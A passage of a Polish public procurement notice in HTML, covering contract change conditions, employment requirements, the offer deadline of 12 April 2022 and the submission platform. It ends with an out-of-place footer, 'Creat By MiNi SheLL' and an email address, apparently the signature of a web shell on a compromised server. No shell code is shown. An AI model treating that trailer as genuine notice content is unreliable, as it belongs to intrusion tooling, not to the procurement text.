przedłożonego wyjaśnienia, może wyrazić zgodę na proponowaną zmianę bądź je<br/>odrzucić z podaniem przyczyny. Zastrzega się, że nowa osoba wykonująca zadania kierownika robót musi posiadać<br/>uprawnienia/kwalifikacje i doświadczenie nie mniejsze niż osoba wskazana przez Wykonawcę przed przejęciem terenu<br/>robót, co Wykonawca zobowiązany jest udokumentować.Zamawiający dopuszcza możliwość zmiany harmonogramu<br/>rzeczowego finansowego w szczególności przesunięć realizacji rzeczowej przedmiotu zamówienia lub kategorii robót za<br/>zgodą Zamawiającego.Dopuszczalne są wszelkie zmiany nieistotne rozumiane jako zmiany umowy wywołane przyczynami<br/>zewnętrznymi, które w sposób obiektywny uzasadniają potrzebę tych zmian, niepowodujące zachwiania równowagi<br/>ekonomicznej pomiędzy Wykonawcą a Zamawiającym, które nie prowadzą również do zachwiania pozycji konkurencyjnej<br/>Wykonawcy w stosunku do innych Wykonawców biorących udział w postępowaniu, jak też nie prowadzą do zmiany kręgu<br/>Wykonawców zdolnych do wykonania zamówienia lub zainteresowanych udziałem w postępowaniu ani na wynik<br/>postępowania.<br/>Warunkiem dokonania zmian, o których mowa powyżej jest:<br/>1) inicjowanie zmian przez Wykonawcę lub Zamawiającego,<br/>2) uzasadnienie zmiany,<br/>3) forma pisemna pod rygorem nieważności. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-04-12 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://nowemiasto.ezamawiajacy.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-04-12 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com